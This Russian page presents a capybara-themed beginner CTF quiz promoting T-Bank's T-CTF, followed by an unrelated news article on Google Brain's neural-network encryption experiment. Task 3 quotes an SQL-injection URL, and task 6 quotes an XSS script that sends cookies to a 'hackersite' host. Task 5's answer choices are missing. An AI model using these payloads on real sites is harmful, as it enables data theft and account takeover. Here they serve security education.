Капибаровску нужен герой
Защитите пушистых от хакеров
Добро пожаловать в Капибаровск — город, где обитают добродушные капибары, совершенно не разбирающиеся в кибербезопасности и цифровых уязвимостях. Местные мошенники, вирусы и баги то и дело грозят нарушить покой пушистых жителей. Вашей команде поручено помочь капибарам разобраться с проблемами и спасти их от киберкатастроф.
Каждая задачка — это небольшой эпизод из жизни города. Вам нужно «взять флаг», выбрав правильный способ решения киберпроблемы. Удачи!
А еще «взять флаг» можно в соревновании T-CTF по кибербезопасности от Т-Банка, которое пройдет с 19 по 20 апреля 2025 года. Регистрация уже открыта. Призы — до 420 000 рублей на команду. Вы будете искать уязвимости и разгадывать тайны Капибаровска. Решить задачи смогут и те, кто еще не участвовал в CTF, например разработчики, инженеры, аналитики и другие ИТ-специалисты. Выбирайте лигу по скиллам и тренируйтесь в демоверсии заданий.
Задача №1. Подозрительная ссылка для КапиКэша
Капибара Платон получил сообщение на почту: «Срочно зайдите по ссылке https://kapi-bank.ru-bonus.wow/cash и введите данные своей карты, чтобы получить +1000 капибар к счету!» Платон сомневается, стоит ли переходить по ссылке.
Как правильнее всего поступить, чтобы обезопасить себя (и свой КапиКэш)?
Задача №2. Секретная записка в баре «Капибара»
В бар «Капибара» поступила анонимная записка с непонятной абракадаброй. Бармен-криптоэнтузиаст уверен, что это обычная строка в Base64, но не знает, как ее расшифровать, а в конце там спрятан флаг. Текст записки:
U2F2ZV9SQU1fQ0FQSUJBUg==
Как проще всего «поймать» содержимое записки?
Задача №3. Утечка данных в КапиБанке
В КапиБанке обнаружили подозрительный лог-файл, в котором зашифрованы несколько клиентских записей. Вот один из фрагментов:
hxxp://kapibank.local/users?ID=19%20OR%201%3D1
Кажется, в городе завелся SQL-инъектор, который пытается извлечь все пользовательские данные. Что происходит в этой строке?
Задача №4. Капибара-электрик и зашифрованное сообщение
Капибара-электрик получила сообщение о плановом отключении электроэнергии, но оно закодировано каким-то сдвигом. Фрагмент текста:
OLJKWV RII WRPRUURZ
Электрик вспоминает, что есть старинный метод шифрования, в котором буквы сдвигаются на несколько позиций в алфавите. Какой это метод и как получить исходное сообщение?
Задача №5. Странный файл из КапиПорта
В грузовом терминале КапиПорта обнаружили ZIP-архив с названием capibar_shipping.zip. При попытке его открыть появляется требование ввести пароль. Внутри, говорят, спрятан важный флаг «Междугородняя доставка».
На выбор даны три подхода:
Задача №6. Баг в веб-приложении «КапиЧат»
Команда заметила, что в чате Капибаровска можно вставлять HTML-теги. Пользователи вместо обычного текста вводят что-то вроде:
⟨script⟩document.location=’http://hackersite?cookie=’+document.cookie;⟨/script⟩
При этом некоторые капибары жалуются, что их личные данные утекли к мошенникам. С чем мы имеем дело?
Задача №7. Лог-файл с подозрительным hex-кодом
В системе КапиПочты зафиксирован пакет, содержащий строку:
54 68 69 73 20 69 73 20 66 6C 61 67 3A 20 7B 43 54 46 5F 4B 41 50 49 5F 42 41 52 7D
Специалисты уверены, что в этой последовательности шестнадцатеричных чисел спрятан флаг. Как его достать?
Задача №8. Атака на шифросервис «КапиКод»
В городе появился новый облачный шифровальщик «КапиКод», который принимает любой текст и возвращает якобы «надежный зашифрованный результат». Но выяснилось, что разработчик случайно оставил в коде отладочную строчку и шифр легко ломается с помощью «уязвимости повторных ключей».
В чем суть проблемы?
Реклама: АО «ТБанк», ИНН 7710140679. Erid: 2W5zFHoiMXW
Дуэт ученых из Google Brain провел необычный эксперимент: авторы создали три нейросети, две из которых — Алиса и Боб — обменивались зашифрованными сообщениями, а третья сеть — Ева — пыталась их «подслушать» и расшифровать переписку. Разработчики не регулировали то, как именно Алиса и Боб шифровали сообщения, тем не менее, в большинстве тестовых запусков нейросетям удавалось создать метод шифрования, который Ева не смогла взломать. Препринт исследования выложен на arXiv.org.Интерес к все более новым системам шифрования во многом обусловлен требованиями современных платежных системам и в целом проблемой безопасности обмена данными в интернете. Проблему защищенной передачи информации пытаются решать разными способами: например, используя квантовое шифрование или децентрализованные сети, в которых пользователи сами проверяют достоверность транзакций. Однако существуют и более необычные сферы применения шифрования, например, в сложных программах на основе нейросетей может потребоваться скрыть ту или иную информацию от определенных частей системы. В этом случае разработчикам не столь важно понять, как именно нейросеть будет шифровать данные, до тех пор, пока программа справляется со своей задачей.Авторы новой работы решили проверить, насколько нейросети вообще способны обучаться методам шифрования. Для этого ученые создали тестовую систему: нейросеть Алиса получала входное сообщение и условный «ключ», а на выходе генерировала зашифрованное сообщение, которое передавалось Бобу вместе с ключом. Задачей Боба было воспроизвести исходное сообщение, которое получила Алиса. Третья нейросеть — Ева — получала только зашифрованное сообщение, а ее задача была такой же, как у Боба — прочитать исходное сообщение.Нейросети обучали методом обратного распространения ошибки, при этом от функция потерь Евы зависела лишь от того, насколько она ошиблась при расшифровки сообщения. Алису и Боба же тренировали вместе так, чтобы Боб ошибался как можно меньше (успехом считалось наличие менее 5 процентов ошибок в тексте сообщения), а условная «идеальная Ева» (оптимально работающая для данного набора сообщений и ключей) ошиблась как можно сильнее - ее результат должен был не очень отличаться от результата случайного перебора.